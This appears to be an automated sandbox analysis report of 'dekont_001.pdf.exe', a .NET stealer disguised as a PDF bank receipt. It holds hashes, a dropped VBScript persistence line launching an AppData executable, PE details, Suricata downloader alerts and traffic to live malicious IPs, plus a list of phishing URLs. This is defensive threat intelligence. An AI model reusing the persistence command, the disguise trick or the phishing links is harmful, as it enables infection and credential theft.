	Contact Form and Delivery Details.png.lnk	Get hash	malicious	Unknown	Browse	188.132.193.46
	e-dekont.html.exe	Get hash	malicious	AgentTesla	Browse	188.132.200.16
	ZgBCG135hk.elf	Get hash	malicious	Mirai, Moobot	Browse	77.92.131.244
UTMEMUS	come.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	132.226.8.169
	INVOICE.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	132.226.8.169
	Fa24c148.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.247.73
	z1RECONFIRMPAYMENTINVOICE.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	132.226.247.73
	AWB#21138700102.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	na.doc	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	na.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	na.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	mnobizxv.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	Bank transfer receipt 241015.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	https://docs.google.com/drawings/d/1O7L6jnunpKYYRy1ZXX5DN4ENeZ4pxxWF8BG0mcDdFi0/preview?pli=1ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVe	Get hash	malicious	HTMLPhisher	Browse	188.114.97.3
	z74fBF2ObiS1g87mbS.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	https://docs.google.com/drawings/d/1JRNFh_1Cbzym_iLfw5aw8-eo7G0EKRf1L0-MpuWvb2k/preview?pli=1MiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqGttUWGqloBvri51h9LRErd3HWCRoBdFauRsSvK8yaHFbMiAYvqG	Get hash	malicious	Unknown	Browse	188.114.97.3
	https://docs.google.com/drawings/d/14Q1EGmG0TWb0poSuSYwhNHZWOm-kG4Jlnk5Hg076lVI/preview?pli=132E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWlXEloAdV6HX14O32E7OVeVm3Yu5P8NzksOSE1huGfymTeBDpSWl	Get hash	malicious	Mamba2FA	Browse	188.114.97.3
	come.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.97.3
	INVOICE.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	188.114.97.3
	QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	z19UrgentOrder.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.97.3
	Fa24c148.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	#U304a#U898b#U7a4d#U308a#U4f9d#U983c.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	188.114.97.3
3b5074b1b5d032e5620f69f9f700ff0e	V9fubyadY6.exe	Get hash	malicious	Quasar	Browse	188.132.193.46
	(No subject) (93).eml	Get hash	malicious	HTMLPhisher	Browse	188.132.193.46
	https://onedrive.live.com/view.aspx?resid=8656653D19C3C7C0!sb98dbf79ab614921877689e4912e2fae&migratedtospo=true&redeem=aHR0cHM6Ly8xZHJ2Lm1zL28vYy84NjU2NjUzZDE5YzNjN2MwL0VubV9qYmxocXlGSmgzYUo1SkV1TDY0QmtKQzA5SEFwTjV6cTh1YW5PSWxxNEE_ZT1pdGFpeGo&wd=target%28Sezione%20senza%20titolo.one%7Ccfe57f3b-5d7b-4d15-b045-f6fdb53b3776%2FRechnung%2039920898-43006843%20%5C%7C%20Ebner%20Media%20Group%7C205becae-dae9-4a36-907a-485bcab69387%2F%29&wdorigin=NavigationUrl	Get hash	malicious	Unknown	Browse	188.132.193.46
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	188.132.193.46
	https://1drv.ms/o/c/dfbe417e0dc15e08/Esl_LBLy3yNEou5UFJ-QxnIBMGmncz8uv1GwgEHKevm1cw?e=C2cldF	Get hash	malicious	Unknown	Browse	188.132.193.46
	https://gofile.io/d/IAr464	Get hash	malicious	Phisher	Browse	188.132.193.46
	https://dl.dropboxusercontent.com/scl/fi/95is2w1ywjvorzayt88dp/DKM-0192PDF.zip?rlkey=svoej4s4tb5lwbnvthtgrmokl&st=d99zdn1k&dl=0	Get hash	malicious	Abobus Obfuscator	Browse	188.132.193.46
	EwKKdCrEDu.exe	Get hash	malicious	Unknown	Browse	188.132.193.46
	EwKKdCrEDu.exe	Get hash	malicious	Unknown	Browse	188.132.193.46
	Fedex.exe	Get hash	malicious	AgentTesla	Browse	188.132.193.46

Process:	C:\Users\user\Desktop\dekont_001.pdf.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	91
Entropy (8bit):	4.732002580925962
Encrypted:	false
SSDEEP:	3:FER/n0eFHHot+kiEaKC5wFlXvtAEnn:FER/lFHIwknaZ5wHvt1
MD5:	DA0DB1C7935A18B9F655382500FB1734
SHA1:	890DDB5E556F6D8E02530A8DB1F7A4F375B6B67A
SHA-256:	9D7DF7457AE3FC744616BF00E5D207B6FE337758CFE29DEA5F31F6A68729B6F5
SHA-512:	D529F378A4861C5FBDC1F9B380D74A59A8127D261CBF57CA7492284253C7A2783322C4943AB0541CC4A5FCEB35BC0954B573D8B9DFFBF18B908E303575814522
Malicious:	true
Reputation:	low
Preview:	CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\RequiredContract.exe"""

C:\Users\user\AppData\Roaming\RequiredContract.exe

Download File

Process:	C:\Users\user\Desktop\dekont_001.pdf.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	76288
Entropy (8bit):	6.028687878926887
Encrypted:	false
SSDEEP:	1536:s2bQcZBZbO8nKwK3Px4wSa43VZFnWFCH2n8yIejHBoswZDg7uj:s2bQF8CPbS71WFCW00HqswRgG
MD5:	D998DA7BE623B6299E9257FCF5F80E3E
SHA1:	91D22E36B0AA0484136B1EE6AE17ABB1F4963927
SHA-256:	4BB7AD555A0641FD9020B58AC7FDEB4EAB618214F056A489739AD6AA91F528AE
SHA-512:	2C842A461F28225F1CB87A7A904593789F22E5A8F4A33C4B445B0C50C8E07B52B708B670B110AC006BE5C997DC8D5B20BF874448ABAAEB7A8F817F9F839DF597
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 37%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....M.g................. ...........>... ........@.. ....................................`.................................p>..K....@.......................`....................................................... ............... ..H............text........ ... .................. ..`.rsrc........@......."..............@..@.reloc.......`.......(..............@..B.................>......H....... ...P...............h............................................0..........(......(....&.0..J.......s.....(.......(....u......(.... )-..(}... .......o....(........,..o................8>.......0..K.......(.......(....u......(....o....~....%:....&~..........s....%.....(...+(.....s...........(....Z.o.... ...(}...(.......0..$.......(.......(....u....(......(....(.....0.......... ...(}...(..... _..(}...(.....(.......(....u.......(....s..........o......s.......

C:\Users\user\AppData\Roaming\RequiredContract.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\dekont_001.pdf.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	6.028687878926887
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	dekont_001.pdf.exe
File size:	76'288 bytes
MD5:	d998da7be623b6299e9257fcf5f80e3e
SHA1:	91d22e36b0aa0484136b1ee6ae17abb1f4963927
SHA256:	4bb7ad555a0641fd9020b58ac7fdeb4eab618214f056a489739ad6aa91f528ae
SHA512:	2c842a461f28225f1cb87a7a904593789f22e5a8f4a33c4b445b0c50c8e07b52b708b670b110ac006be5c997dc8d5b20bf874448abaaeb7a8f817f9f839df597
SSDEEP:	1536:s2bQcZBZbO8nKwK3Px4wSa43VZFnWFCH2n8yIejHBoswZDg7uj:s2bQF8CPbS71WFCW00HqswRgG
TLSH:	74732C3C579C0A26DBD92579D291604C4BF1C2E94A03EB8FADDD62F91CC2FA5C846B43
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....M.g................. ...........>... ........@.. ....................................`................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x413ebe
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x671F4D1F [Mon Oct 28 08:36:47 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x13e70	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x14000	0x600	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x16000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x11ec4	0x12000	4c7cc8215326fc574b7bb1e05373a385	False	0.5026177300347222	data	6.0898699311167155	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x14000	0x600	0x600	831f20fba0e57c7386b5be651253306b	False	0.4166666666666667	data	4.0813340041674255	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x16000	0xc	0x200	9be6ea4aa8e27b68c199b91afbaa195a	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x140a0	0x31c	data			0.4296482412060301
RT_MANIFEST	0x143bc	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-28T19:04:17.171949+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49731	132.226.247.73	80	TCP
2024-10-28T19:04:18.406339+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49731	132.226.247.73	80	TCP
2024-10-28T19:04:19.122909+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49733	188.114.97.3	443	TCP
2024-10-28T19:04:20.062755+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49734	132.226.247.73	80	TCP
2024-10-28T19:04:22.531398+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49737	188.114.97.3	443	TCP
2024-10-28T19:04:25.945477+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49745	188.114.97.3	443	TCP
2024-10-28T19:04:27.659639+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49748	188.114.97.3	443	TCP
2024-10-28T19:04:35.218856+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49753	132.226.247.73	80	TCP
2024-10-28T19:04:36.390779+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49753	132.226.247.73	80	TCP
2024-10-28T19:04:37.154934+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49755	188.114.97.3	443	TCP
2024-10-28T19:04:38.078355+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49756	132.226.247.73	80	TCP
2024-10-28T19:04:40.531396+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49759	188.114.97.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 28, 2024 19:04:06.979075909 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:06.979110956 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:06.979182959 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:06.997104883 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:06.997117996 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:08.473808050 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:08.473884106 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:08.500761032 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:08.500778913 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:08.501183987 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:08.547068119 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:08.664686918 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:08.707377911 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:09.021330118 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:09.062567949 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:09.181835890 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:09.181857109 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:09.181875944 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:09.181884050 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:09.181915998 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:09.181915998 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:09.181942940 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:09.182075024 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:09.182075024 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:09.182075024 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:09.300945044 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:09.300966024 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:09.301043987 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:09.301059008 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:09.301085949 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:09.301109076 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:09.420253992 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:09.420274973 CET	443	49730	188.132.193.46	192.168.2.4
Oct 28, 2024 19:04:09.420348883 CET	49730	443	192.168.2.4	188.132.193.46
Oct 28, 2024 19:04:09.420361042 CET	443	49730	188.132.193.46	192.168.2.4
